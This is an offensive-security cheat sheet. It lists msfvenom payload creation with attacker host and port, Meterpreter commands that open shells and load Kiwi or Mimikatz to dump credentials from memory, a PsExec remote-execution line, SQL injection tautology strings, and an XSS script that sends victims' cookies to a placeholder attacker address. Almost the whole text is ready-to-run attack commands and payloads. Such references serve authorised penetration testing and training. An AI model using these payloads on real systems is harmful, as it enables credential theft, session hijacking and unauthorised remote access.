Metasploit
- Create standalone payload via MSFVenom
- # msfvenom -p [payload] LHOST=[attack_machine] LPORT=[attack_port] -f [file_extension] > [path_to_file+ext]
Meterpreter
- Invoke shell
- meterpreter > execute -f cmd.exe -c
- meterpreter > channel -I [#]
- Load primary and extended functionality
- meterpreter > load stdapi
- meterpreter > load extapi
- Load Mimikatz or Kiwi (for dumping credentials in memory)
- meterpreter > load kiwi
- meterpreter > load mimikatz
- Launch executable
- execute -f [program.exe] -c
Powershell Empire
PSEXEC
- Launch PSEXEC against a remote target
- C:\> psexec \\[targetIP] [-d] [-u user] [-p password] [command]
SQL Injection
- Testing for SQL Injection using TRUE statements
- ' ' or 1=1
- " or 1=1
- ' or 'a'='a
- ') or ('a'='a
Cross Site Scripting (XSS)
- Reflected
- Stored
- DOM
- Using Netcat to grab cookies
- Set up listener on attacker machine
- Embed script on target site
- <script>document.location='http://[your_address]:[PN]/grab.cgi?'+document.cookie;</script>